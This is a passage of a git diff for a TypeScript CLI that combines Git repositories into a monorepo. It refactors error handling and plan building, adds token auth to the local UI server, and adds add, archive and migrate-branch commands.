cwd: repo.path, stdio: 'pipe' }); + applied.push(patch.filename); + successfullyAppliedPatches.push(patch.filename); } catch (applyError) { logger.warn(`Failed to apply patch ${patch.filename}: ${applyError instanceof Error ? 
applyError.message : String(applyError)}`); + failed.push(patch.filename); } // Remove temp patch file await removeDir(patchPath); } - if (repoPatches.length > 0) { + if (applied.length > 0) { // Stage and commit execFileSync('git', ['add', '-A'], { cwd: repo.path, stdio: 'pipe' }); - execFileSync( - 'git', - ['-c', 'user.email=monotize@monotize.dev', '-c', 'user.name=monotize', 'commit', '-m', 'chore: pre-migration preparation (monotize)'], - { cwd: repo.path, stdio: 'pipe' } - ); - logger.success(`Applied ${repoPatches.length} patches to ${repo.name}`); + const status = execFileSync('git', ['status', '--porcelain'], { + cwd: repo.path, + encoding: 'utf-8', + }).trim(); + + if (status.length > 0) { + execFileSync( + 'git', + ['-c', 'user.email=monotize@monotize.dev', '-c', 'user.name=monotize', 'commit', '-m', 'chore: pre-migration preparation (monotize)'], + { cwd: repo.path, stdio: 'pipe' } + ); + } else { + logger.warn(`No staged changes to commit for ${repo.name} after patch apply`); + } + + logger.success(`Applied ${applied.length}/${repoPatches.length} patches to ${repo.name}`); + } else if (repoPatches.length > 0) { + logger.warn(`No patches were applied to ${repo.name}`); } else { logger.info(`No patches needed for ${repo.name}`); } + + if (failed.length > 0) { + logger.warn(`Failed patches for ${repo.name}: ${failed.join(', ')}`); + } } // Write .monotize/config.json @@ -169,7 +202,7 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions targetNodeVersion, targetPackageManager, branchName, - appliedPatches: analysis.patches.map((p) => p.filename), + appliedPatches: successfullyAppliedPatches, }; await writeJson(path.join(monotizeDir, 'config.json'), config, { spaces: 2 }); @@ -225,6 +258,20 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions logger.log(checklistMd); } + // --out mode: write PreparationPlan JSON + if (options.out) { + const { writeJson: wj } = await import('../utils/fs.js'); + 
const planOut = path.resolve(options.out); + const preparationPlan = { + schemaVersion: 1 as const, + createdAt: new Date().toISOString(), + checklist: analysis.checklist, + patches: analysis.patches, + }; + await wj(planOut, preparationPlan); + logger.success(`PreparationPlan written to ${planOut}`); + } + // Cleanup temp dir if we created one await cleanup(); } catch (error) { @@ -236,6 +283,6 @@ export async function prepareCommand(repos: string[], options: CLIPrepareOptions } await cleanup(); - process.exit(1); + throw new CliExitError(); } } diff --git a/src/commands/ui.ts b/src/commands/ui.ts index 55ee294..cb8b0e9 100755 --- a/src/commands/ui.ts +++ b/src/commands/ui.ts @@ -1,7 +1,8 @@ -import { exec } from 'node:child_process'; +import { execFile } from 'node:child_process'; import path from 'node:path'; import { fileURLToPath } from 'node:url'; import { createLogger } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; interface CLIUiOptions { port: string; @@ -15,7 +16,7 @@ export async function uiCommand(options: CLIUiOptions): Promise { if (isNaN(port) || port < 0 || port > 65535) { logger.error(`Invalid port: ${options.port}`); - process.exit(1); + throw new CliExitError(); } // Dynamic import to avoid loading express/ws when running other CLI commands @@ -27,33 +28,54 @@ export async function uiCommand(options: CLIUiOptions): Promise { const __dirname = path.dirname(fileURLToPath(import.meta.url)); const uiDistDir = path.resolve(__dirname, '../ui/dist'); - const server = createServer({ port, staticDir: uiDistDir }); + const { server, token } = createServer({ port, staticDir: uiDistDir }); + await new Promise((resolve, reject) => { + const onListening = () => { + const addr = server.address(); + const actualPort = typeof addr === 'object' && addr ? 
addr.port : port; + const url = `http://localhost:${actualPort}`; - server.on('listening', () => { - const addr = server.address(); - const actualPort = typeof addr === 'object' && addr ? addr.port : port; - const url = `http://localhost:${actualPort}`; + logger.success(`Server running at ${url}`); + logger.info(`Auth token: ${token}`); + logger.info('Pass this token as Authorization: Bearer for API requests'); + logger.info('Press Ctrl+C to stop'); - logger.success(`Server running at ${url}`); - logger.info('Press Ctrl+C to stop'); - - if (options.open) { - const cmd = - process.platform === 'darwin' - ? 'open' + if (options.open) { + const browserUrl = `${url}?token=${token}`; + const { command, args } = process.platform === 'darwin' + ? { command: 'open', args: [browserUrl] } : process.platform === 'win32' - ? 'start' - : 'xdg-open'; - exec(`${cmd} ${url}`); - } - }); + ? { command: 'cmd', args: ['/c', 'start', '', browserUrl] } + : { command: 'xdg-open', args: [browserUrl] }; + execFile(command, args, (err) => { + if (err) logger.debug(`Failed to open browser: ${err.message}`); + }); + } + }; + + const onError = (err: NodeJS.ErrnoException) => { + cleanup(); + if (err.code === 'EADDRINUSE') { + logger.error(`Port ${port} is already in use. Try a different port with -p.`); + } else { + logger.error(`Server error: ${err.message}`); + } + reject(new CliExitError()); + }; + + const onClose = () => { + cleanup(); + resolve(); + }; + + const cleanup = () => { + server.off('listening', onListening); + server.off('error', onError); + server.off('close', onClose); + }; - server.on('error', (err: NodeJS.ErrnoException) => { - if (err.code === 'EADDRINUSE') { - logger.error(`Port ${port} is already in use. 
Try a different port with -p.`); - } else { - logger.error(`Server error: ${err.message}`); - } - process.exit(1); + server.on('listening', onListening); + server.on('error', onError); + server.on('close', onClose); }); } diff --git a/src/commands/verify-checks.ts b/src/commands/verify-checks.ts index cfd73a6..78c1760 100755 --- a/src/commands/verify-checks.ts +++ b/src/commands/verify-checks.ts @@ -20,12 +20,16 @@ export interface VerifyContext { dir: string | null; } +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + // --------------------------------------------------------------------------- // Helpers // --------------------------------------------------------------------------- /** Read PackageInfo[] from a monorepo directory's packages/ subfolder. */ -async function readPackagesFromDir(dir: string): Promise { +async function readPackagesFromDir(dir: string, parseErrors?: string[]): Promise { const packagesDir = path.join(dir, 'packages'); if (!(await pathExists(packagesDir))) return []; @@ -47,8 +51,8 @@ async function readPackagesFromDir(dir: string): Promise { path: path.join(packagesDir, name), repoName: name, }); - } catch { - // skip malformed package.json + } catch (error) { + parseErrors?.push(`Failed to read ${pkgJsonPath}: ${getErrorMessage(error)}`); } } return packages; @@ -57,7 +61,7 @@ async function readPackagesFromDir(dir: string): Promise { /** Build PackageInfo[] from plan sources. * First tries reading package.json from the source path on disk. * Falls back to checking plan.files for packages//package.json entries. 
*/ -async function packagesFromPlan(plan: ApplyPlan): Promise { +async function packagesFromPlan(plan: ApplyPlan, parseErrors?: string[]): Promise { const packages: PackageInfo[] = []; for (const source of plan.sources) { let pkgJson: Record | null = null; @@ -67,7 +71,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { if (await pathExists(pkgJsonPath)) { try { pkgJson = await readJson>(pkgJsonPath); - } catch { /* fall through */ } + } catch (error) { + parseErrors?.push(`Failed to read ${pkgJsonPath}: ${getErrorMessage(error)}`); + } } // Fallback: check plan.files for an inline package.json @@ -79,7 +85,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { if (pkgFile) { try { pkgJson = JSON.parse(pkgFile.content) as Record; - } catch { /* skip */ } + } catch (error) { + parseErrors?.push(`Failed to parse ${pkgFile.relativePath}: ${getErrorMessage(error)}`); + } } } @@ -100,9 +108,9 @@ async function packagesFromPlan(plan: ApplyPlan): Promise { } /** Get packages for the current context. 
*/ -async function getPackages(ctx: VerifyContext): Promise { - if (ctx.plan) return packagesFromPlan(ctx.plan); - if (ctx.dir) return readPackagesFromDir(ctx.dir); +async function getPackages(ctx: VerifyContext, parseErrors?: string[]): Promise { + if (ctx.plan) return packagesFromPlan(ctx.plan, parseErrors); + if (ctx.dir) return readPackagesFromDir(ctx.dir, parseErrors); return []; } @@ -163,8 +171,17 @@ export async function checkRootPackageJson(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); hasWorkspacesField = root.workspaces !== undefined; - } catch { /* ignore */ } + } catch (error) { + rootReadError = getErrorMessage(error); + } + + const checks: VerifyCheck[] = []; if (hasPnpmWs || hasWorkspacesField) { - return [check('workspace-config', 'Workspace configuration found', 'pass', 'static', 'files[pnpm-workspace.yaml]')]; + checks.push(check('workspace-config', 'Workspace configuration found', 'pass', 'static', 'files[pnpm-workspace.yaml]')); + } else { + checks.push(check('workspace-config', 'No workspace configuration found', 'fail', 'static', 'files[pnpm-workspace.yaml]')); } - return [check('workspace-config', 'No workspace configuration found', 'fail', 'static', 'files[pnpm-workspace.yaml]')]; + + if (rootReadError) { + checks.push( + check( + 'workspace-config:root-package-json', + 'Could not read root package.json while checking workspace configuration', + 'fail', + 'static', + 'rootPackageJson.workspaces', + rootReadError + ) + ); + } + return checks; } return []; @@ -203,10 +240,23 @@ export async function checkWorkspaceConfig(ctx: VerifyContext): Promise { const checks: VerifyCheck[] = []; - const packages = await getPackages(ctx); + const parseErrors: string[] = []; + const packages = await getPackages(ctx, parseErrors); + + for (const [index, details] of parseErrors.entries()) { + checks.push(check( + `pkg-read-error:${index}`, + 'Failed to read one or more package.json files', + 'fail', + 'static', + undefined, + details + 
)); + } if (packages.length === 0) { - checks.push(check('pkg-names', 'No packages found', 'warn', 'static')); + const status: VerifyCheck['status'] = parseErrors.length > 0 ? 'fail' : 'warn'; + checks.push(check('pkg-names', 'No packages found', status, 'static')); return checks; } @@ -241,8 +291,17 @@ export async function checkRootScripts(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); scripts = (root.scripts as Record) || {}; - } catch { - return [check('root-scripts', 'Could not read root package.json scripts', 'warn', 'static')]; + } catch (error) { + return [ + check( + 'root-scripts', + 'Could not read root package.json scripts', + 'warn', + 'static', + 'rootPackageJson.scripts', + getErrorMessage(error) + ), + ]; } } @@ -301,8 +360,17 @@ export async function checkTsconfigSanity(ctx: VerifyContext): Promise>(path.join(ctx.dir, 'package.json')); hasEngines = root.engines !== undefined; - } catch { /* ignore */ } + } catch (error) { + rootReadError = getErrorMessage(error); + } } - checks.push( - hasEngines - ? check('root-engines', 'Root package.json has engines field', 'pass', 'static', 'rootPackageJson.engines') - : check('root-engines', 'Root package.json missing engines field', 'warn', 'static', 'rootPackageJson.engines') - ); + if (rootReadError) { + checks.push( + check( + 'root-engines', + 'Could not read root package.json for engines field check', + 'fail', + 'static', + 'rootPackageJson.engines', + rootReadError + ) + ); + } else { + checks.push( + hasEngines + ? 
check('root-engines', 'Root package.json has engines field', 'pass', 'static', 'rootPackageJson.engines') + : check('root-engines', 'Root package.json missing engines field', 'warn', 'static', 'rootPackageJson.engines') + ); + } return checks; } diff --git a/src/commands/verify.ts b/src/commands/verify.ts index 844c500..db9239e 100755 --- a/src/commands/verify.ts +++ b/src/commands/verify.ts @@ -3,6 +3,7 @@ import chalk from 'chalk'; import type { VerifyCheck, VerifyResult, VerifyTier } from '../types/index.js'; import { pathExists, readJson } from '../utils/fs.js'; import { createLogger, formatHeader } from '../utils/logger.js'; +import { CliExitError } from '../utils/errors.js'; import { validatePlan } from './apply.js'; import { type VerifyContext, @@ -42,11 +43,11 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { // Validate exactly one of --plan / --dir if (options.plan && options.dir) { logger.error('Specify either --plan or --dir, not both'); - process.exit(1); + throw new CliExitError(); } if (!options.plan && !options.dir) { logger.error('Specify either --plan or --dir '); - process.exit(1); + throw new CliExitError(); } let ctx: VerifyContext; @@ -58,12 +59,12 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { inputPath = path.resolve(options.plan); if (!(await pathExists(inputPath))) { logger.error(`Plan file not found: ${inputPath}`); - process.exit(1); + throw new CliExitError(); } const data = await readJson(inputPath); if (!validatePlan(data)) { logger.error('Invalid plan file'); - process.exit(1); + throw new CliExitError(); } ctx = { plan: data, dir: null }; } else { @@ -71,11 +72,11 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { inputPath = path.resolve(options.dir!); if (!(await pathExists(inputPath))) { logger.error(`Directory not found: ${inputPath}`); - process.exit(1); + throw new CliExitError(); } if (!(await pathExists(path.join(inputPath, 'package.json')))) 
{ logger.error(`No package.json found in ${inputPath}`); - process.exit(1); + throw new CliExitError(); } ctx = { plan: null, dir: inputPath }; } @@ -140,7 +141,9 @@ export async function verifyCommand(options: CLIVerifyOptions): Promise { printVerifyReport(result, options.verbose ?? false); } - process.exit(result.ok ? 0 : 1); + if (!result.ok) { + throw new CliExitError(); + } } function printVerifyReport(result: VerifyResult, verbose: boolean): void { diff --git a/src/core/plan-builder.ts b/src/core/plan-builder.ts new file mode 100644 index 0000000..7b8c32b --- /dev/null +++ b/src/core/plan-builder.ts @@ -0,0 +1,308 @@ +import path from 'node:path'; +import type { + ApplyPlan, + ConflictStrategy, + FileCollision, + FileCollisionStrategy, + Logger, + PackageManagerConfig, + PackageManagerType, + PlanFile, + WorkspaceTool, + WorkflowMergeStrategy, +} from '../types/index.js'; +import { ensureDir, pathExists, readJson, writeJson } from '../utils/fs.js'; +import { validateRepoSources } from '../utils/validation.js'; +import { analyzeDependencies } from '../analyzers/dependencies.js'; +import { detectFileCollisions } from '../analyzers/files.js'; +import { cloneOrCopyRepos } from '../strategies/copy.js'; +import { + generateRootReadme, + mergeGitignores, + resolveFileCollisionToContent, +} from '../strategies/merge-files.js'; +import { generateWorkspaceConfig } from '../strategies/workspace-config.js'; +import { + generateWorkspaceToolConfig, + getWorkspaceToolDependencies, + updateScriptsForWorkspaceTool, +} from '../strategies/workspace-tools.js'; +import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; +import { + resolveDependencyConflicts, +} from '../resolvers/dependencies.js'; +import { + createPackageManagerConfig, + detectPackageManagerFromSources, + generateWorkspaceFiles, + getWorkspacesConfig, + getGitignoreEntries, + getPackageManagerField, + validatePackageManager, +} from '../strategies/package-manager.js'; + +export interface 
BuildPlanOptions { + repos: string[]; + outputDir: string; + packagesDir: string; + sourcesDir: string; + conflictStrategy: ConflictStrategy; + packageManager: PackageManagerType; + autoDetectPm?: boolean; + workspaceTool: WorkspaceTool; + workflowStrategy: WorkflowMergeStrategy; + install: boolean; + noHoist?: boolean; + pinVersions?: boolean; + yes?: boolean; + interactive?: boolean; + verbose?: boolean; + logger: Logger; + promptConflictStrategy?: () => Promise; + promptFileCollisionStrategy?: ( + collision: FileCollision + ) => Promise; +} + +export interface BuildPlanResult { + plan: ApplyPlan; + repoPaths: Array<{ path: string; name: string }>; + collisions: FileCollision[]; + depAnalysis: Awaited>; + pmType: PackageManagerType; + pmConfig: PackageManagerConfig; +} + +export async function buildApplyPlan(options: BuildPlanOptions): Promise { + const logger = options.logger; + const outputDir = path.resolve(options.outputDir); + const packagesDir = options.packagesDir; + const interactive = options.interactive ?? false; + const yes = options.yes ?? false; + const noHoist = options.noHoist ?? false; + const pinVersions = options.pinVersions ?? 
false; + + logger.info('Validating repository sources...'); + const validation = await validateRepoSources(options.repos); + if (!validation.valid) { + throw new Error(`Validation failed: ${validation.errors.join(', ')}`); + } + logger.success(`Found ${validation.sources.length} repositories to merge`); + + await ensureDir(options.sourcesDir); + logger.info('Fetching repositories...'); + const repoPaths = await cloneOrCopyRepos(validation.sources, options.sourcesDir, { + logger, + verbose: options.verbose, + }); + + let pmType = options.packageManager; + if (options.autoDetectPm) { + const detected = await detectPackageManagerFromSources(repoPaths); + if (detected) { + pmType = detected; + } + } + + const pmValidation = validatePackageManager(pmType); + if (!pmValidation.valid) { + throw new Error(pmValidation.error || 'Invalid package manager'); + } + const pmConfig = createPackageManagerConfig(pmType); + + logger.info('Analyzing dependencies...'); + const depAnalysis = await analyzeDependencies(repoPaths); + + logger.info('Detecting file collisions...'); + const collisions = await detectFileCollisions(repoPaths); + + let conflictStrategy = options.conflictStrategy; + if (depAnalysis.conflicts.length > 0 && conflictStrategy === 'prompt') { + if (interactive && !yes && options.promptConflictStrategy) { + conflictStrategy = await options.promptConflictStrategy(); + } else { + conflictStrategy = 'highest'; + } + } + + const resolvedDeps = await resolveDependencyConflicts( + depAnalysis.conflicts, + conflictStrategy, + depAnalysis.resolvedDependencies, + depAnalysis.resolvedDevDependencies + ); + + const fileStrategies = new Map(); + for (const collision of collisions) { + let strategy = collision.suggestedStrategy as FileCollisionStrategy; + if (interactive && !yes && collision.suggestedStrategy !== 'skip' && options.promptFileCollisionStrategy) { + strategy = await options.promptFileCollisionStrategy(collision); + } + fileStrategies.set(collision.path, strategy); + 
} + + const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { + rootName: path.basename(outputDir), + packagesDir, + dependencies: noHoist ? {} : resolvedDeps.dependencies, + devDependencies: noHoist ? {} : resolvedDeps.devDependencies, + pmConfig, + }); + + if (options.workspaceTool !== 'none') { + const availableScripts = Object.keys( + (workspaceConfig.rootPackageJson.scripts as Record) || {} + ); + const updatedScripts = updateScriptsForWorkspaceTool( + workspaceConfig.rootPackageJson.scripts as Record, + options.workspaceTool, + availableScripts + ); + workspaceConfig.rootPackageJson.scripts = updatedScripts; + + const toolDeps = getWorkspaceToolDependencies(options.workspaceTool); + const existingDevDeps = + (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; + workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; + } + + const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); + if (workspacesConfig) { + workspaceConfig.rootPackageJson.workspaces = workspacesConfig; + } + workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); + + const planFiles: PlanFile[] = []; + + const workspaceFiles = generateWorkspaceFiles(pmConfig, packagesDir); + for (const file of workspaceFiles) { + planFiles.push({ relativePath: file.filename, content: file.content }); + } + + if (options.workspaceTool !== 'none') { + const toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, options.workspaceTool); + if (toolConfig) { + planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); + } + } + + if (options.workflowStrategy !== 'skip') { + logger.info('Processing CI/CD workflows...'); + try { + const workflowFiles = await mergeWorkflowsToFiles(repoPaths, options.workflowStrategy); + planFiles.push( + ...workflowFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })) + ); + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + logger.warn(`Failed to process workflows: ${message}`); + } + } + + for (const collision of collisions) { + const strategy = fileStrategies.get(collision.path) || (collision.suggestedStrategy as FileCollisionStrategy); + const collisionFiles = await resolveFileCollisionToContent(collision, strategy, repoPaths); + planFiles.push( + ...collisionFiles.map((f) => ({ relativePath: f.relativePath, content: f.content })) + ); + } + + const hasGitignoreCollision = collisions.some((c) => c.path === '.gitignore'); + if (!hasGitignoreCollision) { + const gitignorePaths: string[] = []; + for (const r of repoPaths) { + const p = path.join(r.path, '.gitignore'); + if (await pathExists(p)) { + gitignorePaths.push(p); + } + } + + let gitignoreContent = + gitignorePaths.length > 0 + ? await mergeGitignores(gitignorePaths) + : 'node_modules/\ndist/\n.DS_Store\n*.log\n'; + const pmEntries = getGitignoreEntries(pmConfig); + if (pmEntries.length > 0) { + gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; + } + planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); + } + + const readmeContent = generateRootReadme( + repoPaths.map((r) => r.name), + packagesDir, + pmConfig + ); + planFiles.push({ relativePath: 'README.md', content: readmeContent }); + + if (noHoist) { + const npmrcContent = `# Prevent dependency hoisting - each package manages its own dependencies +# This helps avoid type conflicts between packages with different version requirements +shamefully-hoist=false +hoist=false + +# Use lowest satisfying versions to avoid breaking changes in newer releases +resolution-mode=lowest +`; + planFiles.push({ relativePath: '.npmrc', content: npmrcContent }); + } + + if (pinVersions) { + logger.debug('Pinning dependency versions (removing ^ and ~ ranges)'); + for (const repo of repoPaths) { + const pkgJsonPath = path.join(repo.path, 'package.json'); + if (!(await pathExists(pkgJsonPath))) continue; + try { + 
const pkgJson = await readJson>(pkgJsonPath); + let modified = false; + + const pinDeps = ( + deps: Record | undefined + ): Record | undefined => { + if (!deps) return deps; + const pinned: Record = {}; + for (const [name, version] of Object.entries(deps)) { + if (version.startsWith('^') || version.startsWith('~')) { + pinned[name] = version.slice(1); + modified = true; + } else { + pinned[name] = version; + } + } + return pinned; + }; + + pkgJson.dependencies = pinDeps(pkgJson.dependencies as Record); + pkgJson.devDependencies = pinDeps(pkgJson.devDependencies as Record); + pkgJson.peerDependencies = pinDeps(pkgJson.peerDependencies as Record); + + if (modified) { + await writeJson(pkgJsonPath, pkgJson, { spaces: 2 }); + } + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.warn(`Failed to pin versions in ${repo.name}: ${message}`); + } + } + } + + const plan: ApplyPlan = { + version: 1, + sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), + packagesDir, + rootPackageJson: workspaceConfig.rootPackageJson, + files: planFiles, + install: options.install, + installCommand: pmConfig.installCommand, + analysisFindings: depAnalysis.findings, + }; + + return { + plan, + repoPaths, + collisions, + depAnalysis, + pmType, + pmConfig, + }; +} diff --git a/src/index.ts b/src/index.ts index ed9f2d8..10f7da7 100755 --- a/src/index.ts +++ b/src/index.ts @@ -8,13 +8,26 @@ import { planCommand } from './commands/plan.js'; import { verifyCommand } from './commands/verify.js'; import { prepareCommand } from './commands/prepare.js'; import { uiCommand } from './commands/ui.js'; +import { addCommand } from './commands/add.js'; +import { archiveCommand } from './commands/archive.js'; +import { migrateBranchCommand } from './commands/migrate-branch.js'; +import { registerConfigureCommand } from './commands/configure.js'; +import { CliExitError } from './utils/errors.js'; +import { readFileSync } from 'node:fs'; +import { 
fileURLToPath } from 'node:url'; +import { dirname, join } from 'node:path'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const { version: MONOTIZE_VERSION } = JSON.parse( + readFileSync(join(__dirname, '..', 'package.json'), 'utf-8') +); const program = new Command(); program .name('monorepo') .description('Combine multiple Git repositories into a monorepo') - .version('0.2.0'); + .version(MONOTIZE_VERSION); program .command('merge') @@ -145,9 +158,58 @@ program .option('--patch-only', 'Emit patches only (default mode)') .option('--out-dir ', 'Write patches and checklist to directory') .option('--prep-workspace ', 'Clone repos, apply patches, commit on branch') + .option('--out ', 'Write PreparationPlan JSON to file') .option('-v, --verbose', 'Verbose output') .action(prepareCommand); +program + .command('add') + .description('Add a repository to an existing monorepo') + .argument('', 'Repository to add (URL, GitHub shorthand, or local path)') + .requiredOption('--to ', 'Path to target monorepo') + .option('-p, --packages-dir ', 'Packages subdirectory name', 'packages') + .option('--out ', 'Output path for plan JSON') + .option('--apply', 'Apply immediately after planning') + .option( + '--conflict-strategy ', + 'Dependency conflict resolution strategy (highest, lowest, prompt)', + 'highest' + ) + .option( + '--package-manager ', + 'Package manager to use (pnpm, yarn, yarn-berry, npm)', + 'pnpm' + ) + .option('-v, --verbose', 'Verbose output') + .action(addCommand); + +program + .command('archive') + .description('Generate deprecation notices and optionally archive source repositories') + .argument('', 'Repositories to archive (URLs or GitHub shorthand)') + .requiredOption('--monorepo-url ', 'URL of the monorepo these repos migrated to') + .option('--out ', 'Output path for archive plan JSON') + .option('--apply', 'Apply archive operations via GitHub API') + .option('--token-from-env', 'Read GitHub token from GITHUB_TOKEN environment variable') + 
.option('-v, --verbose', 'Verbose output') + .action(archiveCommand); + +program + .command('migrate-branch') + .description('Migrate a branch from a source repo to a monorepo') + .argument('', 'Branch name to migrate') + .requiredOption('--from ', 'Source repository path') + .requiredOption('--to ', 'Target monorepo path') + .option( + '--strategy ', + 'Migration strategy (subtree, replay)', + 'subtree' + ) + .option('--out ', 'Output path for branch plan JSON') + .option('--apply', 'Apply migration immediately') + .option('-v, --verbose', 'Verbose output') + .action(migrateBranchCommand); + program .command('ui') .description('Start the web UI server') @@ -156,4 +218,12 @@ program .option('-v, --verbose', 'Verbose output') .action(uiCommand); -program.parse(); +registerConfigureCommand(program); + +program.parseAsync().catch((err: unknown) => { + if (err instanceof CliExitError) { + process.exit(err.exitCode); + } + // Re-throw unexpected errors + throw err; +}); diff --git a/src/server/api.ts b/src/server/api.ts index 8edf7d7..a1c7d2c 100755 --- a/src/server/api.ts +++ b/src/server/api.ts @@ -20,6 +20,7 @@ import { ensureDir, writeJson, readFile, + readJson, pathExists, writeFile, move, @@ -35,32 +36,12 @@ import { generateRecommendations, } from '../commands/analyze.js'; import { - resolveDependencyConflicts, getConflictSummary, } from '../resolvers/dependencies.js'; import { - generateWorkspaceConfig, -} from '../strategies/workspace-config.js'; -import { - generateWorkspaceToolConfig, - getWorkspaceToolDependencies, - updateScriptsForWorkspaceTool, -} from '../strategies/workspace-tools.js'; -import { mergeWorkflowsToFiles } from '../strategies/workflow-merge.js'; -import { - generateRootReadme, - mergeGitignores, - resolveFileCollisionToContent, -} from '../strategies/merge-files.js'; -import { - createPackageManagerConfig, - generateWorkspaceFiles, - getWorkspacesConfig, - getGitignoreEntries, - getPackageManagerField, parsePackageManagerType, - 
validatePackageManager, } from '../strategies/package-manager.js'; +import { buildApplyPlan } from '../core/plan-builder.js'; import { validatePlan } from '../commands/apply.js'; import type { VerifyContext } from '../commands/verify-checks.js'; import { @@ -86,7 +67,6 @@ import { computePlanHash, } from '../utils/operation-log.js'; import type { OperationLogEntry, ApplyStepId } from '../types/index.js'; -import { readJson } from '../utils/fs.js'; import crypto from 'node:crypto'; // ─── Analyze ─────────────────────────────────────────────────────────────── @@ -158,8 +138,8 @@ export async function runAnalyze( } finally { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up temp dir: ' + (err instanceof Error ? err.message : String(err))); } } } @@ -184,189 +164,45 @@ export async function runPlan( logger: Logger, ): Promise<{ planPath: string; plan: ApplyPlan }> { const outputDir = path.resolve(options.output || './monorepo'); - const packagesDir = options.packagesDir || 'packages'; + const planFilePath = path.resolve(`${path.basename(outputDir)}.plan.json`); + const sourcesDir = `${planFilePath}.sources`; const workspaceTool: WorkspaceTool = options.workspaceTool || 'none'; const workflowStrategy: WorkflowMergeStrategy = options.workflowStrategy || 'combine'; - const noHoist = options.hoist === false; const conflictStrategy: ConflictStrategy = options.conflictStrategy || 'highest'; + const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); - // Generate plan file path - const planFilePath = path.resolve(`${path.basename(outputDir)}.plan.json`); - const sourcesDir = `${planFilePath}.sources`; - - // Validate - logger.info('Validating repository sources...'); - const validation = await validateRepoSources(repos); - if (!validation.valid) { - throw new Error(`Validation failed: ${validation.errors.join(', ')}`); - } - logger.success(`Found ${validation.sources.length} 
repositories to merge`); - - // Clone/copy repos - await ensureDir(sourcesDir); - logger.info('Fetching repositories...'); - const repoPaths = await cloneOrCopyRepos(validation.sources, sourcesDir, { - logger, + const result = await buildApplyPlan({ + repos, + outputDir, + packagesDir: options.packagesDir || 'packages', + sourcesDir, + conflictStrategy, + packageManager: pmType, + autoDetectPm: false, + workspaceTool, + workflowStrategy, + install: options.install !== false, + noHoist: options.hoist === false, + pinVersions: options.pinVersions === true, + yes: true, + interactive: false, verbose: true, + logger, }); - // Package manager - const pmType = parsePackageManagerType(options.packageManager || 'pnpm'); - const pmValidation = validatePackageManager(pmType); - if (!pmValidation.valid) { - throw new Error(pmValidation.error!); - } - const pmConfig = createPackageManagerConfig(pmType); - - // Analyze dependencies - logger.info('Analyzing dependencies...'); - const depAnalysis = await analyzeDependencies(repoPaths); - - if (depAnalysis.conflicts.length > 0) { - const summary = getConflictSummary(depAnalysis.conflicts); + if (result.depAnalysis.conflicts.length > 0) { + const summary = getConflictSummary(result.depAnalysis.conflicts); logger.warn( - `Found ${depAnalysis.conflicts.length} dependency conflicts ` + + `Found ${result.depAnalysis.conflicts.length} dependency conflicts ` + `(${summary.incompatible} incompatible, ${summary.major} major, ${summary.minor} minor)`, ); } - // File collisions - logger.info('Detecting file collisions...'); - const collisions = await detectFileCollisions(repoPaths); - - // Resolve dependency conflicts (always use non-interactive strategy) - const resolvedDeps = await resolveDependencyConflicts( - depAnalysis.conflicts, - conflictStrategy, - depAnalysis.resolvedDependencies, - depAnalysis.resolvedDevDependencies, - ); - - // Generate workspace config - const workspaceConfig = generateWorkspaceConfig(depAnalysis.packages, { - 
rootName: path.basename(outputDir), - packagesDir, - dependencies: noHoist ? {} : resolvedDeps.dependencies, - devDependencies: noHoist ? {} : resolvedDeps.devDependencies, - pmConfig, - }); - - // Update scripts for workspace tool - if (workspaceTool !== 'none') { - const availableScripts = Object.keys( - (workspaceConfig.rootPackageJson.scripts as Record) || {}, - ); - const updatedScripts = updateScriptsForWorkspaceTool( - workspaceConfig.rootPackageJson.scripts as Record, - workspaceTool, - availableScripts, - ); - workspaceConfig.rootPackageJson.scripts = updatedScripts; - - const toolDeps = getWorkspaceToolDependencies(workspaceTool); - const existingDevDeps = - (workspaceConfig.rootPackageJson.devDependencies as Record) || {}; - workspaceConfig.rootPackageJson.devDependencies = { ...existingDevDeps, ...toolDeps }; - } - - // Add workspaces field for yarn/npm - const workspacesConfig = getWorkspacesConfig(pmConfig, packagesDir); - if (workspacesConfig) { - workspaceConfig.rootPackageJson.workspaces = workspacesConfig; - } - workspaceConfig.rootPackageJson.packageManager = getPackageManagerField(pmConfig); - - // Collect plan files - const planFiles: Array<{ relativePath: string; content: string }> = []; - - // Workspace files - const workspaceFilesList = generateWorkspaceFiles(pmConfig, packagesDir); - for (const file of workspaceFilesList) { - planFiles.push({ relativePath: file.filename, content: file.content }); - } - - // Workspace tool config - if (workspaceTool !== 'none') { - const toolConfig = generateWorkspaceToolConfig(depAnalysis.packages, workspaceTool); - if (toolConfig) { - planFiles.push({ relativePath: toolConfig.filename, content: toolConfig.content }); - } - } - - // Merge workflows - if (workflowStrategy !== 'skip') { - logger.info('Processing CI/CD workflows...'); - try { - const workflowFiles = await mergeWorkflowsToFiles(repoPaths, workflowStrategy); - planFiles.push( - ...workflowFiles.map((f) => ({ relativePath: f.relativePath, 
